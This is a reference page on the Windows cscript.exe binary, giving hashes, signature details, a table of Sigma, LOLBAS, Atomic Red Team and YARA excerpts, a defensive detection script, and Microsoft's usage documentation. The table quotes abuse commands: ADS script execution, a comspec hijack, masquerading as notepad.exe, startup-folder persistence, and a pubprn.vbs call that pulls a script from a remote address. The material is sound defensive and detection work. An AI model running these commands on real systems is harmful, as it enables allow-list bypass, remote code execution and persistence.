cscript.exe

  • File Path: C:\Windows\SysWOW64\cscript.exe
  • Description: Microsoft Console Based Script Host

Hashes

  • MD5: 79E4FBFE24A81B3A2AEB3B3D3DEB3D75
  • SHA1: 9C7C87842FED7649412B035DF3712B605E40DBED
  • SHA256: BBD44AC1C7DFD0102EBA486AA1552742A11C4A94283133ED0C4AAC92FAD6A4D9
  • SHA384: C77391A6EB09C7632F996F0CCF693C2B2903D0AC1A35F908DFD4E15066C6D23C822F2F64FB6F74DEBD07592E920DB575
  • SHA512: FD967765BD6E671740FC053C1795A355F9E3B8D47A6B6DF4B3B7CED66A5E84C54038EE3F3231FE6D91ECE2D833F564F4515744E4CFF7369256526B58FC0AFBC4
  • SSDEEP: 3072:ogRukzrvPutB4woyKzs3mYnfEG6NNUSstgNUt9qyyqTxt/I:vvng93mY8sKEqylTk
  • IMP: E4D90F9825B64532B46F2C87EC5B0A16
  • PESHA1: 995511CDD28C6469BB3326310286192DDEC5B5B2
  • PE256: B3EA6658D04C8C1653CBF3D35AD316D097229F923DFAC1C27E73604A0ADAD788

Runtime Data

Usage (stdout):

Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

Usage: CScript scriptname.extension [option...] [arguments...]

Options:
 //B         Batch mode: Suppresses script errors and prompts from displaying
 //D         Enable Active Debugging
 //E:engine  Use engine for executing script
 //H:CScript Changes the default script host to CScript.exe
 //H:WScript Changes the default script host to WScript.exe (default)
 //I         Interactive mode (default, opposite of //B)
 //Job:xxxx  Execute a WSF job
 //Logo      Display logo (default)
 //Nologo    Prevent logo display: No banner will be shown at execution time
 //S         Save current command line options for this user
 //T:nn      Time out in seconds:  Maximum time a script is permitted to run
 //X         Execute script in debugger
 //U         Use Unicode for redirected I/O from the console

Loaded Modules:

  • C:\Windows\SYSTEM32\ntdll.dll
  • C:\Windows\System32\wow64.dll
  • C:\Windows\System32\wow64cpu.dll
  • C:\Windows\System32\wow64win.dll
  • C:\Windows\SysWOW64\cscript.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: cscript.exe
  • Product Name: Microsoft Windows Script Host
  • Company Name: Microsoft Corporation
  • File Version: 5.812.10240.16384
  • Product Version: 5.812.10240.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/70
  • VirusTotal Link: https://www.virustotal.com/gui/file/bbd44ac1c7dfd0102eba486aa1552742a11c4a94283133ed0c4aac92fad6a4d9/detection/

Possible Misuse

The following table contains possible examples of cscript.exe being misused. While cscript.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\cscript.exe' DRL 1.0
sigma godmode_sigma_rule.yml - 'cscript' DRL 1.0
sigma sysmon_cactustorch.yml - '\System32\cscript.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'cscript' DRL 1.0
sigma file_event_win_winrm_awl_bypass.yml description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml title: WScript or CScript Dropper DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml - '\cscript.exe' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\cscript.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\cscript.exe' DRL 1.0
sigma image_load_susp_script_dotnet_clr_dll_load.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_apt_cloudhopper.yml description: Detects suspicious file execution by wscript and cscript DRL 1.0
sigma proc_creation_win_apt_cloudhopper.yml Image|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_lolbin_cscript_gathernetworkinfo.yml description: Adversaries can abuse of C:\Windows\System32\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target DRL 1.0
sigma proc_creation_win_lolbin_cscript_gathernetworkinfo.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml title: WScript or CScript Dropper DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml description: Detects wscript/cscript executions of scripts located in user directories DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_mal_adwind.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_manage_bde_lolbas.yml - 'cscript' DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_multiple_suspicious_cli.yml - cscript.exe DRL 1.0
sigma proc_creation_win_office_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_public_folder_parent.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_csc.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_cscript_vbs.yml title: Cscript Visual Basic Script Execution DRL 1.0
sigma proc_creation_win_susp_cscript_vbs.yml Image|endswith: \cscript.exe DRL 1.0
sigma proc_creation_win_susp_powershell_parent_combo.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml title: Suspicious Registration via cscript.exe DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml - https://ss64.com/vb/cscript.html DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml Image|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_execution.yml description: Detects suspicious file execution by wscript and cscript DRL 1.0
sigma proc_creation_win_susp_script_execution.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_winrm_awl_bypass.yml description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) DRL 1.0
sigma proc_creation_win_susp_winrm_execution.yml Image|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\cscript.exe' DRL 1.0
sigma registry_event_susp_run_key_img_folder.yml - 'cscript' DRL 1.0
LOLBAS Testxlst.yml - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out  
LOLBAS Cscript.yml Name: Cscript.exe  
LOLBAS Cscript.yml - Command: cscript c:\ads\file.txt:script.vbs  
LOLBAS Cscript.yml Description: Use cscript.exe to execute a Visual Basic script stored in an Alternate Data Stream (ADS).  
LOLBAS Cscript.yml - Path: C:\Windows\System32\cscript.exe  
LOLBAS Cscript.yml - Path: C:\Windows\SysWOW64\cscript.exe  
LOLBAS Cscript.yml - IOC: Cscript.exe executing files from alternate data streams  
LOLBAS Cscript.yml - IOC: DotNet CLR libraries loaded into cscript.exe  
LOLBAS Cscript.yml - IOC: DotNet CLR Usage Log - cscript.exe.log  
LOLBAS Manage-bde.yml - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf  
LOLBAS Manage-bde.yml - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf  
LOLBAS Winrm.yml - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'  
LOLBAS Winrm.yml Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location  
atomic-red-team index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md cscript #{vbscript} > $env:TEMP\T1059.005.out.txt MIT License. © 2018 Red Canary
atomic-red-team T1082.md cscript #{vbscript} MIT License. © 2018 Red Canary
atomic-red-team T1105.md CScript.exe AtomicTestT1105.js //E:JScript MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md $macrocode = “ Open "#{jse_path}” For Output As #1n Write #1, “WScript.Quit"n Close #1n Shell$ "cscript.exe #{jse_path}“`n” MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Uses cscript //E:jscript to download a file MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md cscript //E:Jscript #{script_file} MIT License. © 2018 Red Canary
atomic-red-team T1216.md cscript %windir%\System32\manage-bde.wsf MIT License. © 2018 Red Canary
atomic-red-team T1216.001.md PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png. MIT License. © 2018 Red Canary
atomic-red-team T1216.001.md cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost “script:#{remote_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe /E:Jscript “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe /E:Jscript “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse” MIT License. © 2018 Red Canary
signature-base apt_monsoon.yar $x3 = “ cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d” fullword wide CC BY-NC 4.0
signature-base apt_oilrig.yar $x2 = “cscript.exe //T:20 //Nologo “ fullword ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $a1 = “taskkill /F /IM cscript.exe” fullword ascii CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s1 = “/c "C:\windows\temp\cscript" C:\windows\temp\iis.vbs” fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_wannacry.yar $s2 = “cscript.exe //nologo m.vbs” fullword ascii CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0
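A defender-side check for the patterns the table above keeps returning to (a renamed or copied host binary, scripts run from user or temp folders, a script read from an alternate data stream, and an explicit engine override on a file whose extension does not match). This is an added example, not code from Strontic, Sigma, LOLBAS or Atomic Red Team; the event fields (Image, OriginalFileName, CommandLine) follow Sysmon's process-creation event, and the sample records are constructed.

```python
import ntpath
import re

# Folder patterns the "script_exec_from_temp / env_folder" style rules listed above key on.
USER_DIRS = re.compile(r"\\(?:users\\[^\\]+\\appdata\\|users\\public\\|windows\\temp\\|temp\\)", re.I)
ADS_PATH = re.compile(r"^[a-z]:\\[^:]+:[^:\\]+$", re.I)   # drive:\dir\file.txt:stream.vbs
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
ENGINE_EXTS = {"jscript": {".js", ".jse"}, "vbscript": {".vbs", ".vbe"}}

def parse_cmdline(cmd):
    """Return (engine, script_path) from a cscript command line; either may be None."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)][1:]  # drop argv[0]
    engine, script = None, None
    for t in tokens:
        m = re.fullmatch(r"/{1,2}e:(\w+)", t, re.I)      # /E:engine or //E:engine
        if m:
            engine = m.group(1).lower()
        elif t.startswith("/"):
            continue                                    # other host option, e.g. //nologo, //t:30
        else:
            script = t
            break                                       # later tokens are script arguments
    return engine, script

def analyze(event):
    """Return the indicator names one process-creation record triggers (constructed field names)."""
    hits = []
    image = event["Image"]
    if event.get("OriginalFileName", "").lower() == "cscript.exe":
        if ntpath.basename(image).lower() != "cscript.exe":
            hits.append("renamed_cscript")              # masquerading, e.g. running as notepad.exe
        elif not image.lower().startswith(SYSTEM_DIRS):
            hits.append("copied_cscript")               # host copied out of System32/SysWOW64
    engine, script = parse_cmdline(event["CommandLine"])
    if script:
        if USER_DIRS.search(script):
            hits.append("script_in_user_dir")
        if ADS_PATH.match(script):
            hits.append("script_in_ads")
        ext = ntpath.splitext(script)[1].lower()
        if engine in ENGINE_EXTS and ext not in ENGINE_EXTS[engine]:
            hits.append("engine_ext_mismatch")          # e.g. //E:jscript on a .txt file
    return hits

EVENTS = [  # constructed sample records, not real telemetry
    {"Image": r"C:\Windows\System32\cscript.exe", "OriginalFileName": "cscript.exe", "CommandLine": r"cscript //nologo //t:30 C:\Scripts\inventory.vbs"},
    {"Image": r"C:\Users\alice\AppData\Roaming\notepad.exe", "OriginalFileName": "cscript.exe", "CommandLine": r"notepad.exe C:\Users\alice\AppData\Roaming\update.vbs"},
    {"Image": r"C:\Windows\System32\cscript.exe", "OriginalFileName": "cscript.exe", "CommandLine": r"cscript c:\ads\file.txt:script.vbs"},
    {"Image": r"C:\Windows\SysWOW64\cscript.exe", "OriginalFileName": "cscript.exe", "CommandLine": r"cscript.exe //E:jscript C:\Windows\Temp\update.txt"},
]
```

Run `for e in EVENTS: print(analyze(e), e["CommandLine"])` to see which record trips which indicator; the first record is the clean baseline.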

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.

cscript

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Starts a script to run in a command-line environment.

Important: Performing this task does not require you to have administrative credentials. Therefore, as a security best practice, consider performing this task as a user without administrative credentials.

Syntax

cscript <scriptname.extension> [/b] [/d] [/e:<engine>] [{/h:cscript | /h:wscript}] [/i] [/job:<identifier>] [{/logo | /nologo}] [/s] [/t:<seconds>] [/x] [/u] [/?] [<scriptarguments>]

Parameters

  • scriptname.extension: Specifies the path and file name of the script file with optional file name extension.
  • /b: Specifies batch mode, which does not display alerts, scripting errors, or input prompts.
  • /d: Starts the debugger.
  • /e:<engine>: Specifies the engine that is used to run the script.
  • /h:cscript: Registers cscript.exe as the default script host for running scripts.
  • /h:wscript: Registers wscript.exe as the default script host for running scripts. The default.
  • /i: Specifies interactive mode, which displays alerts, scripting errors, and input prompts. The default, and the opposite of /b.
  • /job:<identifier>: Runs the job identified by identifier in a .wsf script file.
  • /logo: Specifies that the Windows Script Host banner is displayed in the console before the script runs. The default, and the opposite of /nologo.
  • /nologo: Specifies that the Windows Script Host banner is not displayed before the script runs.
  • /s: Saves the current command-prompt options for the current user.
  • /t:<seconds>: Specifies the maximum time the script can run (in seconds). You can specify up to 32,767 seconds. The default is no time limit.
  • /u: Specifies Unicode for input and output that is redirected from the console.
  • /x: Starts the script in the debugger.
  • /?: Displays available command parameters and provides help for using them. The same as typing cscript.exe with no parameters and no script.
  • scriptarguments: Specifies the arguments passed to the script. Each script argument must be preceded by a slash (/).
Remarks

  • Each parameter is optional; however, you can’t specify script arguments without specifying a script. If you don’t specify a script or any script arguments, cscript.exe displays the cscript.exe syntax and the valid host options.

  • The /t parameter prevents excessive running of scripts by setting a timer. When the run time exceeds the specified value, cscript interrupts the script engine and ends the process.

  • Windows script files usually have one of the following file name extensions: .wsf, .vbs, .js. Windows Script Host can use .wsf script files. Each .wsf file can use multiple scripting engines and perform multiple jobs.

  • If you double-click a script file with an extension that has no association, the Open With dialog box appears. Select wscript or cscript, and then select Always use this program to open this file type. This registers wscript.exe or cscript.exe as the default script host for files of this file type.

MIT License. Copyright (c) 2020-2021 Strontic.